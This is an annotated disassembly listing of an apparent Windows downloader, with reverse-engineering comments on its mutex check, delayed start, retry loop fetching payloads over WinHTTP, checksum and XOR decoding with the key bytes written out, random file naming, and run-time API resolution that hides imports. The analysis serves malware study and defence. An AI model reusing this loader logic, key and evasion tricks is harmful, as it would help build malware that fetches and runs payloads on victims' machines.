.text:004016DA E9 E5 FE FF FF jmp loc_4015C4
.text:004016DF ; ---------------------------------------------------------------------------
.text:004016DF
.text:004016DF loc_4016DF: ; CODE XREF: start+1F3j
.text:004016DF 57 push edi
.text:004016E0 68 FC 1A 40 00 push offset sub_401AFC ; callback address
.text:004016E5 57 push edi
.text:004016E6 8D 85 B4 F9 FF FF lea eax, [ebp+FileName]
.text:004016EC 50 push eax
.text:004016ED FF 15 F0 1E 40 00 call dword_401EF0 ; (FileName, 0, sub_401AFC, 0): argument shape fits SetupIterateCabinetW(CabinetFile, Reserved, MsgHandler, Context) - presumably the dropped file is a cabinet; confirm in sub_4019C4
.text:004016F3 85 C0 test eax, eax
.text:004016F5 75 0A jnz short loc_401701
.text:004016F7 68 EE 03 00 00 push 3EEh ; error code 3EEh: dword_401EF0 call returned 0
.text:004016FC E9 C3 FE FF FF jmp loc_4015C4
.text:00401701 ; ---------------------------------------------------------------------------
.text:00401701
.text:00401701 loc_401701: ; CODE XREF: start+215j
.text:00401701 6A 0A push 0Ah
.text:00401703 57 push edi
.text:00401704 57 push edi
.text:00401705 FF 35 EC 1E 40 00 push dword_401EEC ; buffer from the 3rd VirtualAlloc; not written in this function, presumably filled by the sub_401AFC callback - confirm
.text:0040170B 57 push edi
.text:0040170C 57 push edi
.text:0040170D FF 15 DC 1E 40 00 call dword_401EDC ; (0, 0, dword_401EEC, 0, 0, 0Ah): six-argument shape fits ShellExecuteW(hwnd, op, file, params, dir, nShowCmd); presumably opens the extracted file - confirm
.text:00401713 8D 45 BC lea eax, [ebp+Name]
.text:00401716 50 push eax ; lpName = "pokjuszo"
.text:00401717 57 push edi ; bInitialOwner
.text:00401718 57 push edi ; lpMutexAttributes
.text:00401719 FF 15 44 10 40 00 call CreateMutexA ; returned handle is not kept; only GetLastError is examined
.text:0040171F FF 15 2C 10 40 00 call GetLastError
.text:00401725 3D B7 00 00 00 cmp eax, 0B7h ; 0B7h = ERROR_ALREADY_EXISTS: another instance already holds the mutex
.text:0040172A 75 07 jnz short loc_401733
.text:0040172C
.text:0040172C loc_40172C: ; CODE XREF: start+2D6j
.text:0040172C 57 push edi ; uExitCode = 0
.text:0040172D FF 15 00 10 40 00 call ExitProcess
.text:00401733 ; ---------------------------------------------------------------------------
.text:00401733
.text:00401733 loc_401733: ; CODE XREF: start+24Aj
.text:00401733 68 90 D0 03 00 push 3D090h ; lower bound: 250000 ms
.text:00401738 B8 D0 DD 06 00 mov eax, 6DDD0h ; upper bound: 450000 ms
.text:0040173D E8 5F 01 00 00 call sub_4018A1 ; random delay in [250000, 450000] ms before any network activity
.text:00401742 59 pop ecx
.text:00401743 50 push eax ; dwMilliseconds
.text:00401744 FF 15 14 10 40 00 call Sleep
.text:0040174A BB 88 13 00 00 mov ebx, 1388h ; 1388h = 5000 ms: initial delay between attempts and the back-off step
.text:0040174F 89 7D F4 mov [ebp+var_C], edi ; var_C = index into the host/path table, starts at 0
.text:00401752 89 5D FC mov [ebp+dwMilliseconds], ebx
.text:00401755
.text:00401755 loc_401755: ; CODE XREF: start+2C2j
.text:00401755 8D 45 F8 lea eax, [ebp+lpBuffer]
.text:00401758 50 push eax ; int (out parameter: local lpBuffer; its value is used as a byte count below)
.text:00401759 8B 45 F4 mov eax, [ebp+var_C]
.text:0040175C FF 74 C5 C8 push [ebp+eax*8+lpString] ; lpString = table[var_C] pointer (8-byte stride)
.text:00401760 E8 A8 04 00 00 call sub_401C0D ; body not in this view; its XREFs include the User-Agent and "GET" strings, so presumably an HTTP GET that returns a buffer or 0
.text:00401765 8B F0 mov esi, eax
.text:00401767 59 pop ecx
.text:00401768 59 pop ecx
.text:00401769 3B F7 cmp esi, edi
.text:0040176B 74 19 jz short loc_401786 ; no buffer: go to the next table entry
.text:0040176D 8B 4D F8 mov ecx, [ebp+lpBuffer] ; ecx = byte count; eax still holds the buffer pointer
.text:00401770 E8 52 01 00 00 call sub_4018C7 ; header/length/check-value validation, returns 1 when accepted
.text:00401775 85 C0 test eax, eax
.text:00401777 75 2B jnz short loc_4017A4
.text:00401779 68 00 80 00 00 push 8000h ; dwFreeType = MEM_RELEASE
.text:0040177E 57 push edi ; dwSize
.text:0040177F 56 push esi ; lpAddress
.text:00401780 FF 15 0C 10 40 00 call VirtualFree ; rejected buffer is freed
.text:00401786
.text:00401786 loc_401786: ; CODE XREF: start+28Bj
.text:00401786 FF 45 F4 inc [ebp+var_C]
.text:00401789 83 7D F4 05 cmp [ebp+var_C], 5
.text:0040178D 75 0A jnz short loc_401799
.text:0040178F 01 5D FC add [ebp+dwMilliseconds], ebx ; after entry 4, lengthen the delay by another 5000 ms
.text:00401792 C7 45 F4 01 00 00+ mov [ebp+var_C], 1 ; restart at index 1, so table entry 0 is only tried on the first pass
.text:00401799
.text:00401799 loc_401799: ; CODE XREF: start+2ADj
.text:00401799 FF 75 FC push [ebp+dwMilliseconds] ; dwMilliseconds
.text:0040179C FF 15 14 10 40 00 call Sleep
.text:004017A2 EB B1 jmp short loc_401755 ; the loop has no attempt limit; it ends only when a buffer is accepted
.text:004017A4 ; ---------------------------------------------------------------------------
.text:004017A4
.text:004017A4 loc_4017A4: ; CODE XREF: start+297j
.text:004017A4 8B 45 F8 mov eax, [ebp+lpBuffer]
.text:004017A7 83 C0 F8 add eax, 0FFFFFFF8h ; byte count minus the 8-byte header
.text:004017AA 50 push eax ; nNumberOfBytesToWrite
.text:004017AB 83 C6 08 add esi, 8 ; skip the 8-byte header that sub_4018C7 checked
.text:004017AE 56 push esi ; lpBuffer
.text:004017AF E8 FF 05 00 00 call sub_401DB3 ; body not in this view; its XREFs are sub_4017BB, CreateFileW, WriteFile, CloseHandle and DeleteFileW, so presumably it writes the payload to a file - confirm
.text:004017B4 59 pop ecx
.text:004017B5 59 pop ecx
.text:004017B6 E9 71 FF FF FF jmp loc_40172C ; ExitProcess(0)
.text:004017B6 start endp
.text:004017B6
.text:004017BB
.text:004017BB ; =============== S U B R O U T I N E =======================================
.text:004017BB ; sub_4017BB: writes a random file name into arg_0 as NUL-terminated UTF-16: 3..arg_4 letters alternating consonant/vowel (consonant first), then '.', then a three-character extension.
.text:004017BB ; Attributes: bp-based frame
.text:004017BB ; Caller cleans the stack. arg_0 = output buffer, arg_4 = maximum letter count, arg_8 = 1 selects "exe"; any other value picks a random entry 0..22h of the extension table (never "exe" or "dll").
.text:004017BB sub_4017BB proc near ; CODE XREF: start+13Ep
.text:004017BB ; sub_401DB3+16p
.text:004017BB ; No output size is passed in: the caller must supply room for arg_4 + 5 WCHARs. Random values come from sub_4018A1 (EAX = upper bound, stack argument = lower bound, both inclusive).
.text:004017BB var_618 = byte ptr -618h
.text:004017BB var_410 = word ptr -410h
.text:004017BB var_208 = word ptr -208h
.text:004017BB var_1FC = word ptr -1FCh
.text:004017BB arg_0 = dword ptr 8
.text:004017BB arg_4 = dword ptr 0Ch
.text:004017BB arg_8 = dword ptr 10h
.text:004017BB ; Locals: var_208 = copy of the vowel string, var_410 = copy of the consonant string, var_618 = copy of the extension table; var_1FC is var_208 + 0Ch, i.e. the '.' at index 6.
.text:004017BB 55 push ebp
.text:004017BC 8B EC mov ebp, esp
.text:004017BE 81 EC 18 06 00 00 sub esp, 618h
.text:004017C4 53 push ebx
.text:004017C5 56 push esi
.text:004017C6 57 push edi
.text:004017C7 68 DC 11 40 00 push offset aAeoiuy_ ; "aeoiuy."
.text:004017CC BE 04 01 00 00 mov esi, 104h ; 104h = character limit used for each of the three copies
.text:004017D1 8D 85 F8 FD FF FF lea eax, [ebp+var_208]
.text:004017D7 56 push esi
.text:004017D8 50 push eax
.text:004017D9 FF 15 FC 1E 40 00 call dword_401EFC ; copy into var_208; pointer has no static target here, (buffer, limit, format) shape - presumably wnsprintfW with the data string as format; confirm in sub_4019C4
.text:004017DF 68 EC 11 40 00 push offset aQwrtpsdfghjklz ; "qwrtpsdfghjklzxcvbnm"
.text:004017E4 8D 85 F0 FB FF FF lea eax, [ebp+var_410]
.text:004017EA 56 push esi
.text:004017EB 50 push eax
.text:004017EC FF 15 FC 1E 40 00 call dword_401EFC ; copy into var_410
.text:004017F2 68 18 12 40 00 push offset aTxtrtfdocchmhl ; "txtrtfdocchmhlpttfpdffb2xlspptmdbcdawav"...
.text:004017F7 8D 85 E8 F9 FF FF lea eax, [ebp+var_618]
.text:004017FD 56 push esi
.text:004017FE 50 push eax
.text:004017FF FF 15 FC 1E 40 00 call dword_401EFC ; copy into var_618
.text:00401805 8B 45 0C mov eax, [ebp+arg_4] ; upper bound for the letter count
.text:00401808 6A 03 push 3 ; lower bound 3
.text:0040180A E8 92 00 00 00 call sub_4018A1
.text:0040180F 8B F0 mov esi, eax ; esi = number of letters to generate
.text:00401811 33 FF xor edi, edi ; edi = 0, pushed below as the lower bound for index draws
.text:00401813 83 C4 28 add esp, 28h ; removes the nine copy arguments and the bound pushed above
.text:00401816 33 DB xor ebx, ebx ; ebx = output index in WCHARs
.text:00401818 3B F7 cmp esi, edi
.text:0040181A 7E 40 jle short loc_40185C ; no letters if the count is not positive
.text:0040181C
.text:0040181C loc_40181C: ; CODE XREF: sub_4017BB+9Fj
.text:0040181C 8B C3 mov eax, ebx
.text:0040181E 25 01 00 00 80 and eax, 80000001h ; signed "ebx mod 2" sequence; ZF is set when the index is even
.text:00401823 79 05 jns short loc_40182A
.text:00401825 48 dec eax
.text:00401826 83 C8 FE or eax, 0FFFFFFFEh
.text:00401829 40 inc eax
.text:0040182A
.text:0040182A loc_40182A: ; CODE XREF: sub_4017BB+68j
.text:0040182A 57 push edi ; lower bound 0 (push leaves the parity flags intact)
.text:0040182B 74 12 jz short loc_40183F ; even index -> consonant
.text:0040182D 6A 05 push 5
.text:0040182F 58 pop eax ; upper bound 5: the six vowels, excluding the '.'
.text:00401830 E8 6C 00 00 00 call sub_4018A1
.text:00401835 66 8B 84 45 F8 FD+ mov ax, [ebp+eax*2+var_208] ; random vowel
.text:0040183D EB 10 jmp short loc_40184F
.text:0040183F ; ---------------------------------------------------------------------------
.text:0040183F
.text:0040183F loc_40183F: ; CODE XREF: sub_4017BB+70j
.text:0040183F 6A 13 push 13h
.text:00401841 58 pop eax ; upper bound 13h: the twenty consonants
.text:00401842 E8 5A 00 00 00 call sub_4018A1
.text:00401847 66 8B 84 45 F0 FB+ mov ax, [ebp+eax*2+var_410] ; random consonant
.text:0040184F
.text:0040184F loc_40184F: ; CODE XREF: sub_4017BB+82j
.text:0040184F 59 pop ecx ; drop the lower-bound argument
.text:00401850 8B 4D 08 mov ecx, [ebp+arg_0]
.text:00401853 66 89 04 59 mov [ecx+ebx*2], ax ; output[ebx] = chosen letter
.text:00401857 43 inc ebx
.text:00401858 3B DE cmp ebx, esi
.text:0040185A 7C C0 jl short loc_40181C
.text:0040185C
.text:0040185C loc_40185C: ; CODE XREF: sub_4017BB+5Fj
.text:0040185C 66 8B 85 04 FE FF+ mov ax, [ebp+var_1FC] ; the '.' taken from the end of the vowel string
.text:00401863 8B 75 08 mov esi, [ebp+arg_0]
.text:00401866 66 89 04 5E mov [esi+ebx*2], ax ; append the separator
.text:0040186A 43 inc ebx
.text:0040186B 83 7D 10 01 cmp [ebp+arg_8], 1
.text:0040186F 75 05 jnz short loc_401876
.text:00401871 6A 69 push 69h
.text:00401873 58 pop eax ; eax = 69h: character offset of "exe" in the extension table
.text:00401874 EB 0D jmp short loc_401883
.text:00401876 ; ---------------------------------------------------------------------------
.text:00401876
.text:00401876 loc_401876: ; CODE XREF: sub_4017BB+B4j
.text:00401876 57 push edi ; lower bound 0
.text:00401877 6A 22 push 22h
.text:00401879 58 pop eax ; upper bound 22h: entries 0..34, which leaves out the last two ("exe", "dll")
.text:0040187A E8 22 00 00 00 call sub_4018A1
.text:0040187F 6B C0 03 imul eax, 3 ; entry index -> character offset (three characters per entry)
.text:00401882 59 pop ecx
.text:00401883
.text:00401883 loc_401883: ; CODE XREF: sub_4017BB+B9j
.text:00401883 8B 4D 08 mov ecx, [ebp+arg_0]
.text:00401886 8D 3C 5E lea edi, [esi+ebx*2] ; destination: just after the '.'
.text:00401889 8D B4 45 E8 F9 FF+ lea esi, [ebp+eax*2+var_618] ; source: selected extension
.text:00401890 A5 movsd
.text:00401891 66 A5 movsw ; movsd + movsw = 6 bytes = three WCHARs
.text:00401893 83 C3 03 add ebx, 3
.text:00401896 5F pop edi
.text:00401897 33 C0 xor eax, eax
.text:00401899 5E pop esi
.text:0040189A 66 89 04 59 mov [ecx+ebx*2], ax ; NUL terminator
.text:0040189E 5B pop ebx
.text:0040189F C9 leave
.text:004018A0 C3 retn
.text:004018A0 sub_4017BB endp
.text:004018A0
.text:004018A1
.text:004018A1 ; =============== S U B R O U T I N E =======================================
.text:004018A1 ; sub_4018A1: returns in EAX a random integer in [arg_0, EAX_in], both inclusive, computed as arg_0 + (random32 mod (EAX_in - arg_0 + 1)).
.text:004018A1 ; Attributes: bp-based frame
.text:004018A1 ; Upper bound is passed in EAX, lower bound on the stack (removed by the caller). Faults with a divide error if EAX_in - arg_0 + 1 is 0.
.text:004018A1 sub_4018A1 proc near ; CODE XREF: start+25Dp
.text:004018A1 ; sub_4017BB+4Fp ...
.text:004018A1 ; The four random bytes come from dword_401F04(buffer, 4), a pointer with no static target in this view. NOTE(review): the (buffer, length) shape fits SystemFunction036 (RtlGenRandom), whose name string is in this file - confirm in sub_4019C4. Its return value is not checked.
.text:004018A1 var_4 = dword ptr -4
.text:004018A1 arg_0 = dword ptr 8
.text:004018A1
.text:004018A1 55 push ebp
.text:004018A2 8B EC mov ebp, esp
.text:004018A4 51 push ecx ; reserves the 4 bytes of var_4
.text:004018A5 56 push esi
.text:004018A6 8B F0 mov esi, eax ; esi = upper bound
.text:004018A8 6A 04 push 4 ; length: 4 bytes
.text:004018AA 8D 45 FC lea eax, [ebp+var_4]
.text:004018AD 50 push eax ; buffer = &var_4
.text:004018AE FF 15 04 1F 40 00 call dword_401F04 ; no stack adjustment follows, so the callee removes its own arguments
.text:004018B4 2B 75 08 sub esi, [ebp+arg_0]
.text:004018B7 8B 45 FC mov eax, [ebp+var_4] ; eax = random dword
.text:004018BA 46 inc esi ; esi = number of values in the range
.text:004018BB 33 D2 xor edx, edx ; clear the high half of the dividend
.text:004018BD F7 F6 div esi ; unsigned divide; remainder in edx
.text:004018BF 5E pop esi
.text:004018C0 8B C2 mov eax, edx
.text:004018C2 03 45 08 add eax, [ebp+arg_0] ; shift the remainder up to the lower bound
.text:004018C5 C9 leave
.text:004018C6 C3 retn
.text:004018C6 sub_4018A1 endp
.text:004018C6
.text:004018C7
.text:004018C7 ; =============== S U B R O U T I N E =======================================
.text:004018C7 ; sub_4018C7: decides whether the buffer returned by sub_401C0D is accepted. Register arguments: EAX = buffer, ECX = byte count. Returns EAX = 1 when accepted, 0 otherwise.
.text:004018C7 ; Layout read here: dword at +0 = value sub_401E80 must return, dword at +4 = payload length (must equal ECX - 8), payload starts at +8. Buffers shorter than 400h bytes are rejected outright.
.text:004018C7 sub_4018C7 proc near ; CODE XREF: start+290p
.text:004018C7 81 F9 00 04 00 00 cmp ecx, 400h ; minimum accepted size: 400h (1024) bytes
.text:004018CD 73 03 jnb short loc_4018D2
.text:004018CF 33 C0 xor eax, eax
.text:004018D1 C3 retn
.text:004018D2 ; ---------------------------------------------------------------------------
.text:004018D2
.text:004018D2 loc_4018D2: ; CODE XREF: sub_4018C7+6j
.text:004018D2 53 push ebx
.text:004018D3 8B 18 mov ebx, [eax] ; ebx = expected check value from the header
.text:004018D5 56 push esi
.text:004018D6 8B 70 04 mov esi, [eax+4] ; esi = payload length declared in the header
.text:004018D9 83 C1 F8 add ecx, 0FFFFFFF8h ; ecx = byte count minus the 8-byte header
.text:004018DC 3B F1 cmp esi, ecx
.text:004018DE 74 04 jz short loc_4018E4
.text:004018E0 33 C0 xor eax, eax ; declared length does not match what was received: reject
.text:004018E2 EB 1D jmp short loc_401901
.text:004018E4 ; ---------------------------------------------------------------------------
.text:004018E4
.text:004018E4 loc_4018E4: ; CODE XREF: sub_4018C7+17j
.text:004018E4 57 push edi
.text:004018E5 8D 78 08 lea edi, [eax+8] ; edi = start of payload
.text:004018E8 56 push esi
.text:004018E9 57 push edi
.text:004018EA E8 15 00 00 00 call sub_401904 ; (payload, length); its body runs past the end of this view - presumably transforms the payload in place before the check; confirm
.text:004018EF 56 push esi
.text:004018F0 57 push edi
.text:004018F1 E8 8A 05 00 00 call sub_401E80 ; (payload, length) -> eax; body not in this view, presumably a checksum - confirm
.text:004018F6 2B C3 sub eax, ebx ; 0 when the computed value equals the header value
.text:004018F8 83 C4 10 add esp, 10h ; removes both argument pairs
.text:004018FB F7 D8 neg eax ; neg/sbb/inc turns the difference into a flag: 0 -> 1, anything else -> 0
.text:004018FD 1B C0 sbb eax, eax
.text:004018FF 40 inc eax
.text:00401900 5F pop edi
.text:00401901
.text:00401901 loc_401901: ; CODE XREF: sub_4018C7+1Bj
.text:00401901 5E pop esi
.text:00401902 5B pop ebx
.text:00401903 C3 retn
.text:00401903 sub_4018C7 endp
.text:00401903
.text:00401904
.text:00401904 ; =============== S U B R O U T I N E =======================================
.text:00401904 ; sub_401904(arg_0 = buffer, arg_4 = length in bytes): XOR-decodes the buffer in place with a 16-byte rolling key.
.text:00401904 ; Attributes: bp-based frame
.text:00401904 ; The key is written to the stack (var_10..var_1) from immediates; after each byte the used key slot is overwritten with the original input byte,
.text:00401904 sub_401904 proc near ; CODE XREF: sub_4018C7+23p
.text:00401904 ; so from offset 16 onward out[i] = in[i] xor in[i-16]. No return value is set; the caller removes the two stack arguments.
.text:00401904 var_10 = byte ptr -10h
.text:00401904 var_F = byte ptr -0Fh
.text:00401904 var_E = byte ptr -0Eh
.text:00401904 var_D = byte ptr -0Dh
.text:00401904 var_C = byte ptr -0Ch
.text:00401904 var_B = byte ptr -0Bh
.text:00401904 var_A = byte ptr -0Ah
.text:00401904 var_9 = byte ptr -9
.text:00401904 var_8 = byte ptr -8
.text:00401904 var_7 = byte ptr -7
.text:00401904 var_6 = byte ptr -6
.text:00401904 var_5 = byte ptr -5
.text:00401904 var_4 = byte ptr -4
.text:00401904 var_3 = byte ptr -3
.text:00401904 var_2 = byte ptr -2
.text:00401904 var_1 = byte ptr -1
.text:00401904 arg_0 = dword ptr 8
.text:00401904 arg_4 = dword ptr 0Ch
.text:00401904 ; Register roles in the loop: ebx = buffer index, edi = key index (0..15), esi = current byte address, edx = current key slot address.
.text:00401904 55 push ebp
.text:00401905 8B EC mov ebp, esp
.text:00401907 83 EC 10 sub esp, 10h ; 16 bytes for the key
.text:0040190A 53 push ebx
.text:0040190B 57 push edi
.text:0040190C 33 DB xor ebx, ebx ; buffer index = 0
.text:0040190E 33 FF xor edi, edi ; key index = 0
.text:00401910 C6 45 F0 80 mov [ebp+var_10], 80h ; key byte 0 (first of 16 immediate key bytes)
.text:00401914 C6 45 F1 3B mov [ebp+var_F], 3Bh
.text:00401918 C6 45 F2 D3 mov [ebp+var_E], 0D3h
.text:0040191C C6 45 F3 23 mov [ebp+var_D], 23h
.text:00401920 C6 45 F4 9C mov [ebp+var_C], 9Ch
.text:00401924 C6 45 F5 E5 mov [ebp+var_B], 0E5h
.text:00401928 C6 45 F6 1A mov [ebp+var_A], 1Ah
.text:0040192C C6 45 F7 BA mov [ebp+var_9], 0BAh
.text:00401930 C6 45 F8 D2 mov [ebp+var_8], 0D2h
.text:00401934 C6 45 F9 93 mov [ebp+var_7], 93h
.text:00401938 C6 45 FA 64 mov [ebp+var_6], 64h
.text:0040193C C6 45 FB 21 mov [ebp+var_5], 21h
.text:00401940 C6 45 FC 0B mov [ebp+var_4], 0Bh
.text:00401944 C6 45 FD D6 mov [ebp+var_3], 0D6h
.text:00401948 C6 45 FE 0B mov [ebp+var_2], 0Bh
.text:0040194C C6 45 FF 19 mov [ebp+var_1], 19h ; key byte 15
.text:00401950 39 5D 0C cmp [ebp+arg_4], ebx
.text:00401953 76 26 jbe short loc_40197B ; length 0: nothing to decode
.text:00401955 56 push esi
.text:00401956
.text:00401956 loc_401956: ; CODE XREF: sub_401904+74j
.text:00401956 8B 45 08 mov eax, [ebp+arg_0]
.text:00401959 8D 34 03 lea esi, [ebx+eax] ; esi = &buffer[ebx]
.text:0040195C 8A 0E mov cl, [esi] ; cl = input byte
.text:0040195E 8D 54 3D F0 lea edx, [ebp+edi+var_10] ; edx = &key[edi]
.text:00401962 8A 02 mov al, [edx] ; al = key byte
.text:00401964 32 C8 xor cl, al ; cl = decoded byte
.text:00401966 32 C1 xor al, cl ; al = key xor decoded = original input byte
.text:00401968 47 inc edi
.text:00401969 88 0E mov [esi], cl ; store decoded byte
.text:0040196B 88 02 mov [edx], al ; key slot now holds the original input byte
.text:0040196D 83 FF 10 cmp edi, 10h
.text:00401970 75 02 jnz short loc_401974
.text:00401972 33 FF xor edi, edi ; wrap the key index after 16 bytes
.text:00401974
.text:00401974 loc_401974: ; CODE XREF: sub_401904+6Cj
.text:00401974 43 inc ebx
.text:00401975 3B 5D 0C cmp ebx, [ebp+arg_4]
.text:00401978 72 DC jb short loc_401956 ; unsigned compare against the length
.text:0040197A 5E pop esi
.text:0040197B
.text:0040197B loc_40197B: ; CODE XREF: sub_401904+4Fj
.text:0040197B 5F pop edi
.text:0040197C 5B pop ebx
.text:0040197D C9 leave
.text:0040197E C3 retn
.text:0040197E sub_401904 endp
.text:0040197E
.text:0040197F
.text:0040197F ; =============== S U B R O U T I N E =======================================
.text:0040197F ; sub_40197F(arg_0 = numeric error code): formats "Error code #%d" into Text, shows it with MessageBoxA (caption "Error"), then calls ExitProcess(0).
.text:0040197F ; Attributes: noreturn bp-based frame
.text:0040197F ; The formatter is called through dword_401EE8, which sub_4019C4 fills from the export name "wnsprintfA".
.text:0040197F sub_40197F proc near ; CODE XREF: start:loc_4015C4p
.text:0040197F ; sub_4019C4:loc_401A0Ap ...
.text:0040197F ; NOTE(review): dword_401EE8 is not checked for NULL; sub_4019C4 calls this routine on its load-failure paths before that slot is written.
.text:0040197F Text = byte ptr -104h
.text:0040197F arg_0 = dword ptr 8
.text:0040197F
.text:0040197F 55 push ebp
.text:00401980 8B EC mov ebp, esp
.text:00401982 81 EC 04 01 00 00 sub esp, 104h ; Text buffer, 104h bytes
.text:00401988 FF 75 08 push [ebp+arg_0] ; value for %d
.text:0040198B 8D 85 FC FE FF FF lea eax, [ebp+Text]
.text:00401991 68 F8 12 40 00 push offset aErrorCodeD ; "Error code #%d"
.text:00401996 68 04 01 00 00 push 104h ; output limit = size of Text
.text:0040199B 50 push eax ; destination = Text
.text:0040199C FF 15 E8 1E 40 00 call dword_401EE8 ; run-time resolved formatter (see sub_4019C4)
.text:004019A2 83 C4 10 add esp, 10h ; caller removes the four arguments
.text:004019A5 6A 10 push 10h ; uType = 10h (MB_ICONERROR)
.text:004019A7 68 08 13 40 00 push offset Caption ; "Error"
.text:004019AC 8D 85 FC FE FF FF lea eax, [ebp+Text]
.text:004019B2 50 push eax ; lpText
.text:004019B3 6A 00 push 0 ; hWnd
.text:004019B5 FF 15 54 10 40 00 call MessageBoxA
.text:004019BB 6A 00 push 0 ; uExitCode
.text:004019BD FF 15 00 10 40 00 call ExitProcess
.text:004019BD sub_40197F endp
.text:004019BD
.text:004019BD ; ---------------------------------------------------------------------------
.text:004019C3 CC align 4
.text:004019C4
.text:004019C4 ; =============== S U B R O U T I N E =======================================
.text:004019C4 ; sub_4019C4: run-time API resolver. Loads SHLWAPI, SETUPAPI, SHELL32, WINHTTP and ADVAPI32 with LoadLibraryA, then looks up 14 exports
.text:004019C4 ; by name with GetProcAddress and stores them in the dword_401EDC..dword_401F18 slots that the rest of this listing calls indirectly.
.text:004019C4 sub_4019C4 proc near ; CODE XREF: start+5Ap
.text:004019C4 ; Reading aid: each "mov dword_xxx, eax" stores the result of the GetProcAddress call before it; the next call's arguments are pushed in between.
.text:004019C4 hModule = dword ptr -8
.text:004019C4 var_4 = dword ptr -4
.text:004019C4 ; NOTE(review): GetProcAddress results and the ADVAPI32 handle are never NULL-checked. Because these names are resolved here, an import-table review alone would presumably not show them.
.text:004019C4 51 push ecx ; the two push ecx reserve the hModule and var_4 slots
.text:004019C5 51 push ecx
.text:004019C6 53 push ebx
.text:004019C7 55 push ebp
.text:004019C8 56 push esi
.text:004019C9 8B 35 38 10 40 00 mov esi, LoadLibraryA ; esi = LoadLibraryA for the five calls below
.text:004019CF 57 push edi
.text:004019D0 68 10 13 40 00 push offset LibFileName ; "SHLWAPI.DLL"
.text:004019D5 FF D6 call esi ; LoadLibraryA
.text:004019D7 68 1C 13 40 00 push offset aSetupapi_dll ; "SETUPAPI.DLL"
.text:004019DC 8B D8 mov ebx, eax ; ebx = SHLWAPI handle
.text:004019DE FF D6 call esi ; LoadLibraryA
.text:004019E0 68 2C 13 40 00 push offset aShell32_dll ; "SHELL32.DLL"
.text:004019E5 8B E8 mov ebp, eax ; ebp = SETUPAPI handle
.text:004019E7 FF D6 call esi ; LoadLibraryA
.text:004019E9 68 38 13 40 00 push offset aWinhttp_dll ; "WINHTTP.DLL"
.text:004019EE 89 44 24 14 mov [esp+1Ch+hModule], eax ; hModule = SHELL32 handle
.text:004019F2 FF D6 call esi ; LoadLibraryA
.text:004019F4 68 44 13 40 00 push offset aAdvapi32_dll ; "ADVAPI32.DLL"
.text:004019F9 8B F8 mov edi, eax ; edi = WINHTTP handle
.text:004019FB FF D6 call esi ; LoadLibraryA
.text:004019FD 89 44 24 14 mov [esp+18h+var_4], eax ; var_4 = ADVAPI32 handle (not checked below)
.text:00401A01 85 DB test ebx, ebx ; SHLWAPI loaded?
.text:00401A03 75 0A jnz short loc_401A0F
.text:00401A05 68 B9 0B 00 00 push 0BB9h ; error code 3001
.text:00401A0A
.text:00401A0A loc_401A0A: ; CODE XREF: sub_4019C4+54j
.text:00401A0A ; sub_4019C4+62j ...
.text:00401A0A E8 70 FF FF FF call sub_40197F ; noreturn error exit; NOTE(review): dword_401EE8 is still unset here, so the formatter call inside it would go through a NULL pointer
.text:00401A0F ; ---------------------------------------------------------------------------
.text:00401A0F
.text:00401A0F loc_401A0F: ; CODE XREF: sub_4019C4+3Fj
.text:00401A0F 85 ED test ebp, ebp ; SETUPAPI loaded?
.text:00401A11 75 07 jnz short loc_401A1A
.text:00401A13 68 BA 0B 00 00 push 0BBAh ; error code 3002
.text:00401A18 EB F0 jmp short loc_401A0A
.text:00401A1A ; ---------------------------------------------------------------------------
.text:00401A1A
.text:00401A1A loc_401A1A: ; CODE XREF: sub_4019C4+4Dj
.text:00401A1A 83 7C 24 10 00 cmp [esp+18h+hModule], 0 ; SHELL32 loaded?
.text:00401A1F 75 07 jnz short loc_401A28
.text:00401A21 68 BB 0B 00 00 push 0BBBh ; error code 3003
.text:00401A26 EB E2 jmp short loc_401A0A
.text:00401A28 ; ---------------------------------------------------------------------------
.text:00401A28
.text:00401A28 loc_401A28: ; CODE XREF: sub_4019C4+5Bj
.text:00401A28 85 FF test edi, edi ; WINHTTP loaded?
.text:00401A2A 75 07 jnz short loc_401A33
.text:00401A2C 68 BC 0B 00 00 push 0BBCh ; error code 3004
.text:00401A31 EB D7 jmp short loc_401A0A
.text:00401A33 ; ---------------------------------------------------------------------------
.text:00401A33
.text:00401A33 loc_401A33: ; CODE XREF: sub_4019C4+66j
.text:00401A33 8B 35 30 10 40 00 mov esi, GetProcAddress ; esi = GetProcAddress for all lookups below
.text:00401A39 68 54 13 40 00 push offset ProcName ; "wnsprintfA"
.text:00401A3E 53 push ebx ; hModule = SHLWAPI
.text:00401A3F FF D6 call esi ; GetProcAddress
.text:00401A41 68 60 13 40 00 push offset aWnsprintfw ; "wnsprintfW"
.text:00401A46 53 push ebx ; hModule = SHLWAPI
.text:00401A47 A3 E8 1E 40 00 mov dword_401EE8, eax ; dword_401EE8 = wnsprintfA
.text:00401A4C FF D6 call esi ; GetProcAddress
.text:00401A4E 68 6C 13 40 00 push offset aSetupiterateca ; "SetupIterateCabinetW"
.text:00401A53 55 push ebp ; hModule = SETUPAPI
.text:00401A54 A3 FC 1E 40 00 mov dword_401EFC, eax ; dword_401EFC = wnsprintfW
.text:00401A59 FF D6 call esi ; GetProcAddress
.text:00401A5B 68 84 13 40 00 push offset aShellexecutew ; "ShellExecuteW"
.text:00401A60 FF 74 24 14 push [esp+1Ch+hModule] ; hModule = SHELL32
.text:00401A64 A3 F0 1E 40 00 mov dword_401EF0, eax ; dword_401EF0 = SetupIterateCabinetW
.text:00401A69 FF D6 call esi ; GetProcAddress
.text:00401A6B 68 94 13 40 00 push offset aStrstriw ; "StrStrIW"
.text:00401A70 53 push ebx ; hModule = SHLWAPI
.text:00401A71 A3 DC 1E 40 00 mov dword_401EDC, eax ; dword_401EDC = ShellExecuteW
.text:00401A76 FF D6 call esi ; GetProcAddress
.text:00401A78 68 A0 13 40 00 push offset aSystemfunction ; "SystemFunction036"
.text:00401A7D FF 74 24 18 push [esp+1Ch+var_4] ; hModule = ADVAPI32
.text:00401A81 A3 F4 1E 40 00 mov dword_401EF4, eax ; dword_401EF4 = StrStrIW
.text:00401A86 FF D6 call esi ; GetProcAddress
.text:00401A88 68 B4 13 40 00 push offset aWinhttpqueryda ; "WinHttpQueryDataAvailable"
.text:00401A8D 57 push edi ; hModule = WINHTTP (also for every lookup below)
.text:00401A8E A3 04 1F 40 00 mov dword_401F04, eax ; dword_401F04 = SystemFunction036
.text:00401A93 FF D6 call esi ; GetProcAddress
.text:00401A95 68 D0 13 40 00 push offset aWinhttpreceive ; "WinHttpReceiveResponse"
.text:00401A9A 57 push edi ; hModule
.text:00401A9B A3 14 1F 40 00 mov dword_401F14, eax ; dword_401F14 = WinHttpQueryDataAvailable
